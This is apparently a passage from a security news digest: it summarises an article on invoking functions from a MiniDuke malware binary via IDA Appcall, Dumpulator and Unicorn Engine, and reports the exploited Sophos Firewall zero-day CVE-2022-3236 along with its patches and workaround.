For a reverse engineer, the ability to directly call a function from the analyzed binary can be a shortcut that bypasses a lot of grief. While in some cases it is just possible to understand the function logic and reimplement it in a higher-level language, this is not always feasible.

In the article, you will learn about 3 different ways to make this “shortcut” happen, and invoke functions directly from assembly. 
The article first covers the IDA Appcall feature which is natively supported by IDA Pro, and can be used directly using IDAPython. 
Then it demonstrates how to achieve the same feat using Dumpulator; 
and finally, you will learn how to get that result using emulation with Unicorn Engine. The practical example used in this article is based on the “tweaked” SHA1 hashing algorithm implemented by a sample of the MiniDuke malware.

8. Hackers Exploited Zero-Day RCE Vulnerability in Sophos Firewall — Patch Released

Security software company Sophos has released a patch update for its firewall product after it was discovered that attackers were exploiting a new critical zero-day vulnerability to attack its customers’ network.

The issue, tracked as CVE-2022-3236 (CVSS score: 9.8), impacts Sophos Firewall v19.0 MR1 (19.0.1) and older and concerns a code injection vulnerability in the User Portal and Webadmin components that could result in remote code execution.

As a workaround, Sophos is recommending that users take steps to ensure that the User Portal and Webadmin are not exposed to WAN. Alternatively, users can update to the latest supported version: v19.5 GA; v19.0 MR2 (19.0.2); v19.0 GA, MR1, and MR1-1; v18.5 MR5 (18.5.5); v18.5 GA, MR1, MR1-1, MR2, MR3, and MR4.
